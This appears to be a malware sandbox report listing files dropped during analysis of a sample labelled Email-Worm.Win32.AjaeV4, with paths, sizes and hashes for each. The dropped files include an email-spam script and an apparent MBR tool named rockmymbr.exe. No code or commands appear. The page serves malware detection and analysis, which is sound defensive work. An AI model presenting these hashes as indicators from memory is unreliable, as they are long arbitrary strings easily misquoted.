a1900d31f91e119fcab953fd53fc0995dbe5cda07e66ca30041ba974eb2a5c0ce8a613293b9293958130ba0a4e405b8fcbb046352ce4cb765a4eb31fe50753d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
58e7e6176dcea69250f46b9803827fc6

SHA1
b6945d11951c6b49f9fd7a67869405fa5f20f597

SHA256
ec5d267beb720b7b14e8ec474b6e6367423ae9e1f6897d528de2b54744a0c89b

SHA512
2c80595190b3769099d7bcf7a81a79b6dce318e54687893adcf198007e6ee529db6d2fcb111e5dba558a04fc0baff7f2cd2b980e84d8dc690ddac5fbc5349be4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
73c7d14bc6b61fc1ba011c8c9261f83c

SHA1
1e8fcfd481e74aa20d90057e381312a972b60ad1

SHA256
39f62f6d23fa300146dd9a77e311024d3aaabdf4a58ad9d6ab3e8416f8405fb2

SHA512
287f1e2cb0967f41e1981b2b5a754bbad3f10f666d8c2c1f8dfb5b49c9c9b99834d6143ef11af08edfc7a745ffaa8bf1cb4c9097b27625a6e9bd357b56d69d14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
ef11afb26ad778c4019083af4d1503d0

SHA1
0d1d4579f2917adcbe044b86350105a17a602632

SHA256
a9db8aa757e635ff0adbbf6c557443637fe116dafe74c74c2affbcc247ca139d

SHA512
b865bef5db80daea13cd5c2f3bc9307a0529624ed8a07a6b8ac83c03fdc66ee3835f789550e2407f1f41fe6210e101cb88d03b37da1d32d226f4eb702050ac5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
70ab0eaae918060dfb15fbed5839ea3d

SHA1
cd5cc060b282caf679ef5e1f93b1a26485cc0bda

SHA256
7fc0ad3e469e017a62db08181214bbb8be05ccb0a66d2e87a6f883f87061960a

SHA512
cf1dbac94ba21cb2e765c3362eea81e47db0bc103c674c85d2df4660562251f533ac808707c24265a881b99737ed94249afaf32ea1c770f8b5e9d14219afc33d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

Filesize
392B

MD5
5e71b3e354264e809aefade931b17070

SHA1
3e573a73bb2b80844ba48da2414f23c3761ca1a7

SHA256
2c5cdaaaa6f56696353dd1ce85b909d35733ffe263a3d16e14c4b3a740550eb2

SHA512
8db9ac7b236cc95206c5140d7993c755ee6afdc8418856124f94e42e0aa7b17302aba8e2d86775bd26489d1bb0e52cf4de7abfebede6e6387d722d3d22d7dde7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter~RFe5883f0.TMP

Filesize
392B

MD5
5c4150d1c20bdc834184a6de6236d92b

SHA1
7f5b727d7fc20d79b591c69c80762af60af19771

SHA256
bf0062d412388d76a05d37d7a291351746162bf4b34d5a4028ab8717de290ebb

SHA512
7d6cc2d6ec75e6e83915914cda97e6aa5b4f9923c7e481be03042cf134bc751a5fbd72ac35513b06c38374396c656e7b89b2f25b68ae52508f1f6e6260cd25f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\component_crx_cache\fgbafbciocncjfbbonhocjaohoknlaco_1.DA1220F5F273289FE6F557EA15FCF05B6B7EB90EE53A8124A608FA4B1308463E

Filesize
7KB

MD5
c6b8f4941e6d3c264fd755630ad06584

SHA1
f622bbc4fcc0bfcabdf3965b9b80a89f927169f5

SHA256
da1220f5f273289fe6f557ea15fcf05b6b7eb90ee53a8124a608fa4b1308463e

SHA512
bf1ac0bdbfb4e6707c3d9d2148f1b329588e95a2f11164a92e4f71443d56b6b46f6b11f1fed7880c10ba03ecfba433ebbdc4bbf301407a95fe626f0d71ad14ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

Filesize
152KB

MD5
dd9bf8448d3ddcfd067967f01e8bf6d7

SHA1
d7829475b2bd6a3baa8fabfaf39af57c6439b35e

SHA256
fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

SHA512
65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

Download Submit
C:\Users\Admin\AppData\Local\Temp\2769.tmp\276A.tmp\276B.bat

Filesize
47KB

MD5
d2048e106024d4ff7f9ad28a2f823efe

SHA1
0a93161c281635b4abb0c63557bacdd89b8bd06a

SHA256
99188d6d1c64f35ec29e2a7b93450b9220ec16cbe03f12683f3f647e10f0bf70

SHA512
d74faf337020cee92147a1f8395932ee34a99a01ec7f0859a755bb9d7c1ea35080202ab93a53dec5b36d2e965315c1cfcd196569a3d960d377e2d7d599bb687c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\AjaeV4.exe

Filesize
178KB

MD5
0ad31a746adb58b3f5640deb8219ad80

SHA1
e12836ae66f3f8ffa53df39ae6fcee9bb7826255

SHA256
c971f1b41d62b335166aa5ee66534041264c31452cfe9ce8c5fabdce4917a461

SHA512
fb07d16b155e702f6b1075ee3f6f09335eeac35026493eb368f421f19aabe8c1d4d781c6daaf89fe7d4d62c0efe182c83fe64e3f0f6e44a6a8ab9f330c489f7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\ajae.txt

Filesize
150B

MD5
9c9064eeb851f8a2f2a11033ca32766e

SHA1
8579b3efcc36b61e500ce655128ab043f0269f63

SHA256
67d05b78e3d8d83fa1684c1e45effd81e8ccf362f9b5f97076bc4ccaa623fae7

SHA512
d50b7efdf01ae2739b3f196afffd4a00c3a7bc6bcad5c0892e56429f93ef621f8582ad3f1f0eb452c03f194710b505c674500f7348da42e28b9ea548c70f6b43

Download Submit
C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\cds.bat

Filesize
116B

MD5
3fb2b114bb369b5394932db3908e5d69

SHA1
326a84388f4856af175ca91767be547d31b716a4

SHA256
02c9e2ee919de743a73cd7803cb6b9b78d25d3b4d621d44b575ca9f4239ebf52

SHA512
cbc41a9bfee339e7e788c7eb3174c9536055c352fd583fad33ff2e1903502dd73dd07f1872b6dc5a71a8b34d524c1b63a06cd710034dd2023e6ba905e32ad361

Download Submit
C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\email_spam.vbs

Filesize
482B

MD5
6f7ccd2b2089677732f9aae2e1801e97

SHA1
c1bbebcb74b8b99445c1fb3dd1a94674f684fe4d

SHA256
3ee68b88b512959d0abcb042535067b640cd6346cc4fb8ca9a3ed2d139e604ce

SHA512
6e5eee90a2a7a78f08a11fb4061232d34f60633bd10b1ba3e432f83db62606ae54ec8cc3470a365cce7176244362227c312e22ec8f90d06f1d31ce1867f55d9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Email-Worm.Win32.AjaeV4\rockmymbr.exe

Filesize
77KB

MD5
59873b6fbb4ea3a1d3b57bd969fd08e2

SHA1
8978d494cf2d92ed3ab4d957550392665bdae5f1

SHA256
f944ddf5b77d51de56b566b88a6abe3875ebba93fc5671c33e92108fe779cf97

SHA512
79178c4bbee68127d18a68621876f181803f82683b92945f8afa52a773a5aa3f0c13ddeeef2678c89595460940f3c0324d47bb651ba5ee021b2a973e7a83f684

Download Submit
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_1334111442\manifest.json

Filesize
85B

MD5
c3419069a1c30140b77045aba38f12cf

SHA1
11920f0c1e55cadc7d2893d1eebb268b3459762a

SHA256
db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f

SHA512
c5e95a4e9f5919cb14f4127539c4353a55c5f68062bf6f95e1843b6690cebed3c93170badb2412b7fb9f109a620385b0ae74783227d6813f26ff8c29074758a1

Download Submit
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_1894071455\manifest.fingerprint

Filesize
66B

MD5
496b05677135db1c74d82f948538c21c

SHA1
e736e675ca5195b5fc16e59fb7de582437fb9f9a

SHA256
df55a9464ee22a0f860c0f3b4a75ec62471d37b4d8cb7a0e460eef98cb83ebe7

SHA512
8bd1b683e24a8c8c03b0bc041288296448f799a6f431bacbd62cb33e621672991141c7151d9424ad60ab65a7a6a30298243b8b71d281f9e99b8abb79fe16bd3c

Download Submit
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_1894071455\manifest.json

Filesize
134B

MD5
049c307f30407da557545d34db8ced16

SHA1
f10b86ebfe8d30d0dc36210939ca7fa7a819d494

SHA256
c36944790c4a1fa2f2acec5f7809a4d6689ecb7fb3b2f19c831c9adb4e17fc54

SHA512
14f04e768956bdd9634f6a172104f2b630e2eeada2f73b9a249be2ec707f4a47ff60f2f700005ca95addd838db9438ad560e5136a10ed32df1d304d65f445780

Download Submit
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping432_363337837\LICENSE

Filesize
1KB

MD5
ee002cb9e51bb8dfa89640a406a1090a

SHA1
49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2

SHA256
3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b

SHA512
d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c

Download Submit

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads